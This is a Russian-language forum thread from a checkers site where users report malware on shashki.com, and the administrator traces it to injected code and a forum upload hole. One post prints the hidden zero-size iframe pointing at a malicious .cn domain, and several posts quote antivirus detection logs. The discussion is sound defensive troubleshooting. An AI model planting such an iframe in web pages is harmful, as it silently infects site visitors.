Шашки в России

Консультации по работе на компьютере - Вирус на сайте.

Symix - Янв 08, 2010 - 12:21 AM
Тема сообщения:
Зaшел на shashki.com
Мой avasр на одном компютере бьет тревогу
Win32:Rootkit-gen [Rtk] Malware
потом сайт захотел инстoлать програму из Индии

CA (Computer Associates) не показывает проблем.

Публичный компютер в клубе пускает на сайт но обьявляет вирусу на любом линке форума.
Symix - Янв 08, 2010 - 03:23 AM
Тема сообщения:
Специально поехал в клуб проверять. Не знаю какой там антивирус. На этот топик допустила, на Задачки от Бужинского нет. Говорит "identity theft" - но это она всегда говорит о сайте shashki.com. Но вот послать ответ оттуда не смог, сайт отказал.
Fenix - Янв 08, 2010 - 04:42 AM
Тема сообщения:
Забавно.
А у меня просто Опера сама закрывается.
A.Presman - Янв 08, 2010 - 06:26 AM
Тема сообщения:
Касперский говорит.

detected: Trojan program Trojan-Downloader.Java.OpenStream.af file: http://generatorwand.cn//0.icq/myf/y/LoaderX.class

Когда он это сказал я посмотрел сурс странички. А там скрытый iframe.

Код:

<iframe src="http://generatorwand.cn//index.php?s=b49f084d83d6446674ea76bf78e8c9dc" width="0" height="0" frameborder="0"></iframe>


Это он.
AlexanderS - Янв 08, 2010 - 07:44 AM
Тема сообщения: Re: Вирус на сайте.
Старенький вирус, странно что касперкий его не видит. Судя по всему Ваша локальная машинка уже тоже заражена, последователями, так что перед тем как выкачивать содержимое и пытаться лечить проверьте себя всем возможным...
Что касается PNphpBB2 - ни разу с ним не сталкивался, но он вроде как динамичный, может в каком-то статическом шаблоне вирь прописался...

Virus: HTML/Infected.WebPage.Gen
Date discovered: 14/08/2007
Type: Trojan
In the wild: Yes
Reported Infections: Low
Distribution Potential: Low
Damage Potential: Low
Static file: No
Engine version: 7.04.01.62

Description:
A common attack against the web infrastructure can be the infection of harmless web pages. Some malware changes every HTML file stored on the disc and adds a link (very often an IFrame) to a site hosting malicious code. Other attacks can aim for the web servers and try to insert forwarding to the pages hosted there. The owner of these pages is advised to take them offline. Fix the hole (either on his own PC or on the server), check the pages for infections, clean them and go online again. Infected Web Pages often contain additional Iframe, Object or Script Tags. The Script Tags often contain encrypted Code.
AlexanderS - Янв 08, 2010 - 12:11 PM
Тема сообщения:
Alkand писал(а):
Вот же... просмотрел самую первую строку с ифрэймом Rolling Eyes привык, что вирусы дописывают себя в конец файла.
Вроде теперь должно быть чисто. Просто совпало, что сразу два (надеюсь, не больше) вируса залезло...


На страницы форума антивирус больше не ругается, но главная страница и любой article - все равно вылазит тот же вирус. Хотя после лечения IE уже открывает страницы
AlexanderS - Янв 08, 2010 - 12:15 PM
Тема сообщения:
AlexanderS писал(а):

На страницы форума антивирус больше не ругается

Уточнение - не на все страницы форума ругается. Вот на этот топик не ругается, а на соседние по ссылке с главной
http://www.shashki.com/PNphpBB2-viewtopic-t-1222.html
http://www.shashki.com/PNphpBB2-viewtopic-t-1399.html
уже ругается...
Alkand - Янв 08, 2010 - 04:28 PM
Тема сообщения:
Спасибо всем за помощь. Вроде все почисттил и поменял пароли.
Заодно проапдейтил лицензию каспера с 7 версии на 10-ую. Оказывается это бесплатно Embarassed
AlexanderS - Янв 08, 2010 - 06:06 PM
Тема сообщения:
Alkand писал(а):
Спасибо всем за помощь. Вроде все почисттил и поменял пароли.
Заодно проапдейтил лицензию каспера с 7 версии на 10-ую. Оказывается это бесплатно Embarassed


Не-а :( Все равно вылазит. Не на всех, но на большинстве страниц. Кэш на всякий случай очистил так что уверен что тянется с сайта...
ALGIMANTAS - Янв 08, 2010 - 08:31 PM
Тема сообщения:
По моему, "вирус" и в добавлений комментариев к текстам на новостной ленте..
Хотел добавить комментарий к теме на новостной ленте о чекерсе. Три раза пробовал - "не проходит". Если это только для "профессоров", простите, не надо. Никто, кроме нескольких фанатиков, не будет затруднять себя.
г.Александру - сотрите там мои неудачные попытки. Из - за уважения к dammen (этот коллега заметный на этом Форуме), короткий свой ответ ему даю здесь (извиняюсь перед г.Александром за off top):

To dammen:
Да, из WCDF на GA FMJD в Берлине никого не было.
Отчет (или «отчет» в ¼ страницы) WCDF можно найти на сайте FMJD:
http://www.fmjd.nl/news.php?nid=480
Отчетов на GA FMJD в Берлине никто не читал (по моему, сделано правильно), так как их заранее можно было прочитать в Интернете, на странице FMJD, они также были направлены и национальным федерациям. По ним можно было задать вопросы, выступить с репликами.
Но по вопросам чекерса, если и было желающих что то спрашивать, не было к кому обращаться…На GA чекерс все таки несколько раз упоминался в разных контекстах.
Algimantas Kačiuška
dammen - Янв 08, 2010 - 09:15 PM
Тема сообщения:
ALGIMANTAS писал(а):

To dammen:
Да, из WCDF на GA FMJD в Берлине никого не было.
Отчет (или «отчет» в ¼ страницы) WCDF можно найти на сайте FMJD:
http://www.fmjd.nl/news.php?nid=480
Отчетов на GA FMJD в Берлине никто не читал (по моему, сделано правильно), так как их заранее можно было прочитать в Интернете, на странице FMJD, они также были направлены и национальным федерациям. По ним можно было задать вопросы, выступить с репликами.
Но по вопросам чекерса, если и было желающих что то спрашивать, не было к кому обращаться…На GA чекерс все таки несколько раз упоминался в разных контекстах.
Algimantas Kačiuška

Благодарю Вас за ответ, господин ALGIMANTAS!
С этим отчётом я ознакомился до ГА, а отсутствие официальных лиц от WCDF вероятно, объясняется неизвестными нам вескими причинами. Надеюсь, alemo внесёт ясность в вопросах взаимоотношений WCDF и FMJD, календаря WCDF-2010 и турнира претендентов в Ирландии.
uvf25 - Янв 09, 2010 - 03:24 AM
Тема сообщения:
Мой "Касперский" уже третий день обнаруживает и нейтрализует на главной странице при первом входе:

09.01.2010 10:20:52 Обнаружено: Trojan.Win32.Fregee.a Ujjgnlsuw Tszqovwfmgjegjwzc C:\TEMP\8E.tmp

Затем всё работает нормально.
Натуля - Янв 10, 2010 - 07:59 AM
Тема сообщения:
опять этот уродец Evil or Very Mad
Натуля - Янв 10, 2010 - 08:02 AM
Тема сообщения:
троянская программа Trojan.Win32.Fregee.a
вылез в теме ЧМ по 100 в Берлине
ps опять принудительный перезагруз(((((( стока всего открыто нужного)))
berg - Янв 10, 2010 - 05:38 PM
Тема сообщения:
Доктор сказал:"C:\Documents and Settings\G....o\Local Settings\Temporary Internet Files\Content.IE5\8RNTSG08\Dtp1NZuedRL2cE34[1].pdf\data001 - инфицирован JS.DownLoader.85"
Два дня назад был другой.
Александр Борисович, это похоже на наезд Evil or Very Mad
Alkand - Янв 10, 2010 - 06:10 PM
Тема сообщения:
Совсем не забавно, что вирусы прут через хостера... Спасибо Антону Шевченко, помог разобраться...
Правда не факт, что хостер сразу прикроет эту дырку, ведь придется признать свою ошибку. Похоже, что хостеру никто кроме меня пока не жаловался или владельцы сайтов не в состоянии найти проблему.
plus600 - Янв 10, 2010 - 06:43 PM
Тема сообщения:
2010.01.10 23:47 главная страница сайта.
=======================================
Scan type: Auto-Protect Scan
Event: Risk Found!
Security risk detected: Bloodhound.Exploit.213
File: C:\Documents and Settings\Serg\Local Settings\Temporary Internet Files\Content.IE5\FNQHDXH6\QMZdlOaDDdLLFMe2[1].pdf
Location: C:\Documents and Settings\Serg\Local Settings\Temporary Internet Files\Content.IE5\FNQHDXH6
Computer: SERGST
User: Ñåðãåé
Action taken: Pending Side Effects Analysis : Access denied
Date found: 10 ÿíâàðÿ 2010 ã. 23:42:22
==========================================
возможно это как-то поможет.
Alkand - Янв 11, 2010 - 10:38 AM
Тема сообщения:
Вести с полей сражений...
После оживленной переписки с поддержкой хостинга (свою ошибку они так и не признали) уже пол-дня как вируса вроде как нету (т-т-т).
Спасибо всем за терпение, понимание и поддержку.
Reader - Янв 11, 2010 - 10:11 PM
Тема сообщения:
Они все еще здесь Evil or Very Mad Сообщение Каспера:

12.01.2010 3:05:24 Вредоносный HTTP-объект http: //generatorwand. cn/xdex.php//xdex: обнаружено: троянская программа 'Trojan.JS.Zapchast.bq'.
Kvadrat64 - Янв 12, 2010 - 04:40 PM
Тема сообщения:
Reader писал(а):
Они все еще здесь Evil or Very Mad Сообщение Каспера:

12.01.2010 3:05:24 Вредоносный HTTP-объект http: //generatorwand. cn/xdex.php//xdex: обнаружено: троянская программа 'Trojan.JS.Zapchast.bq'.

Аналогично
alemo - Янв 13, 2010 - 02:48 AM
Тема сообщения:
Вопрос от чайника: а нужен ли такой хостер, он что - мёдом намазан ? Многие ведь сюда заходят не с домашнего, а с рабочего компа Embarassed
Alkand - Янв 13, 2010 - 04:17 AM
Тема сообщения:
Похоже проблема не в хостере.. Все оказалось для меня сложнее.
Есть уязвимость в движке, что позволяет злоумышленнику внедрять в одну из папок сайта файлик со ссылочкой на зараженный сайт.
Нужна помощь квалифицированного программиста со знаниями РНР и настроек хостинга, либо нужно весь контент переводить на другой движок... либо закрывать сайт ...

Пока же приходится заниматься не поддержкой сайта, а тупым поиском и удаления внедренного кода и серфингом инета в тщетных поисках решения, реализация которого было бы доступно чайнику Rolling Eyes
Kvadrat64 - Янв 13, 2010 - 03:16 PM
Тема сообщения:
Теперь троян типа zapchast лезет.
Alkand - Янв 13, 2010 - 04:06 PM
Тема сообщения:
Вести с боевых полей...
Как минимум нашел дырку в движке форума. Под видом аватарок в ту же папку были закачены пара вредных скриптов. Пока отключил возможность закачки аватар и размещение удаленных. Закончится война (надеюсь), вручную пропишу пути в безопасную папку.

Сижу просматриваю вручную 20 мегов логов доступа к сайту. Может кто утилитку знает какую?
Symix - Дек 30, 2011 - 02:25 PM
Тема сообщения:
При попытках попасть на форум FMJD меня постоянно переводят на рекламный сайт, а как у вас?
Alkand - Дек 30, 2011 - 02:46 PM
Тема сообщения:
Symix писал(а):
При попытках попасть на форум FMJD меня постоянно переводят на рекламный сайт, а как у вас?

Вопрос подобран исключительно по теме топика. Именно про сайт "Шашки в России" и именно про вирус Laughing
Symix - Дек 30, 2011 - 04:11 PM
Тема сообщения:
Alkand писал(а):
Symix писал(а):
При попытках попасть на форум FMJD меня постоянно переводят на рекламный сайт, а как у вас?

Вопрос подобран исключительно по теме топика. Именно про сайт "Шашки в России" и именно про вирус Laughing

Алканду - ничего в названии темы не говорит "Шашки в России", оно более общее "вирус на сайте". В данном случае я попросил помощи узнать или FMJD сайт подхватил вирус. Спасибо за помощь.
A.Presman - Дек 30, 2011 - 04:16 PM
Тема сообщения:
Сайт ФМЖД ничего не подхватывал и работал нормально. Это можно было определить, зайдя на http://fmjd.org
Проблема была с доменом http://laatste.info , на котором находится форум.
Я его (домен) хотел перенести к другому регистратору, но замешкался и просрочил дату продления.
Спасибо коллегам, подсказали, что что-то не в порядке.
После оплаты все восстановилось, а пару часов там висела просто реклама, которую регистратор автоматически вывешивает на неотконфигурированные сайты.
Symix - Дек 30, 2011 - 04:21 PM
Тема сообщения:
Большое спасибо, мой сигнал был услышан и решение найдено, теперь все работает прекрасно.
A.Presman писал(а):
Сайт ФМЖД ничего не подхватывал и работал нормально. Это можно было определить, зайдя на http://fmjd.org
Проблема была с доменом http://laatste.info , на котором находится форум.
Я его (домен) хотел перенести к другому регистратору, но замешкался и просрочил дату продления.
Спасибо коллегам, подсказали, что что-то не в порядке.
После оплаты все восстановилось, а пару часов там висела просто реклама, которую регистратор автоматически вывешивает на неотконфигурированные сайты.

A.Presman - Дек 30, 2011 - 04:51 PM
Тема сообщения:
Symix писал(а):
Большое спасибо, мой сигнал был услышан и решение найдено, теперь все работает прекрасно.


Не из вредности, а справедливости ради...
Услышан был другой сигнал, который был направлен непосредственно.
Я просто уже не раз просил и повторю еще раз.
Если есть какие-то проблемы, неполадки с сайтом, то самое верное об этом сразу написать его администратору на мэйл, скайп и т.д.
А не на форуме другого сайта (даже самого уважаемого).
abramov - Дек 30, 2011 - 05:02 PM
Тема сообщения:
A.Presman писал(а):
Symix писал(а):
Большое спасибо, мой сигнал был услышан и решение найдено, теперь все работает прекрасно.


Не из вредности, а справедливости ради...
Услышан был другой сигнал, который был направлен непосредственно.
Я просто уже не раз просил и повторю еще раз.
Если есть какие-то проблемы, неполадки с сайтом, то самое верное об этом сразу написать его администратору на мэйл, скайп и т.д.
А не на форуме другого сайта (даже самого уважаемого).


Александр! Тогда просьба от редактора журнала: Пожалуйста, выкладывайте результаты прошедших соревнований (желательно в форматах швейцарки - чтобы было видно, кто в каком туре с кем играл). Достаточно в течение недели после завершения.
А так результаты появляются в рейтинг-листе раз в 3 месяца. Информация уже запоздалая.
А если брать текущуюинформацию от проводящих, то бывают всякие но.. И потом "краснесть" за дезинформацию приходится.
Вот сделал Трофимов упор на освещение результатов, но это все же его сайт -не официоз!
A.Presman - Дек 30, 2011 - 05:13 PM
Тема сообщения:
Для того, чтобы это случилось должно измениться структурно довольно многое. (Шансы на это изменение, правда, есть)
При сегодняшней структуре это невозможно.
Актуальную информацию способен предоставить только организатор. Если в ней будут ошибки, то они будут даже если на ней поставить штамп официальной.
А формально турнирные результаты становятся "официальными" только пройдя какие-то стадии (обработка директором турниров). Но тогда это уже не так свежо.
abramov - Дек 30, 2011 - 05:22 PM
Тема сообщения:
A.Presman писал(а):
Для того, чтобы это случилось должно измениться структурно довольно многое. (Шансы на это изменение, правда, есть)
При сегодняшней структуре это невозможно.
Актуальную информацию способен предоставить только организатор. Если в ней будут ошибки, то они будут даже если на ней поставить штамп официальной.
А формально турнирные результаты становятся "официальными" только пройдя какие-то стадии (обработка директором турниров). Но тогда это уже не так свежо.


Увы. Жаль. что такие реалиии. Мы как-то привыкли, что если по телевизору видим окончание футбольного матча 1-1, или заплыв в плавании, то это результат, и его преподносят СМИ.
Кому (болельщику) потом дело до официоза.
Но, все же, просьба, по мере возможность делать на сайте Live.
Symix - Янв 10, 2014 - 03:14 PM
Тема сообщения:
Нужна помощь

Последние пару месяцев статистика сайта библиотеки показывает группу торговых и возможно порн русских сайтов (типа "муж на час" или "ремонт техники") откуда якобы подключались в библиотеку, я осторожно посмотрел там но линков не нашел. Вопрос - как от них избавиться? Куда то жаловаться, что то изменить у себя?

Сегодня пришло письмо с жалобой
McAfee Siteadvisor gives me a warning for your page .....
"When we visited this site, we found it exhibited one or more risky behaviors."

Norton и AVG говорят что сайт в порядке.
Second - Янв 10, 2014 - 03:49 PM
Тема сообщения:
Попробуй пароль админа поменять. Я помню, привязалась ко мне одна зараза и с интервалом в 2 недели мне хостер присылал сообщения о том . что на сайте вирус. Я добросовестно вычищал все, но ничего не помогало, пока пароль не поменял на более длинный и труднее подбираемый.
Symix - Янв 10, 2014 - 05:27 PM
Тема сообщения:
пароль поменял месяц назад - не помогло
Время в формате GMT + 3
PNphpBB2 © 2003-2007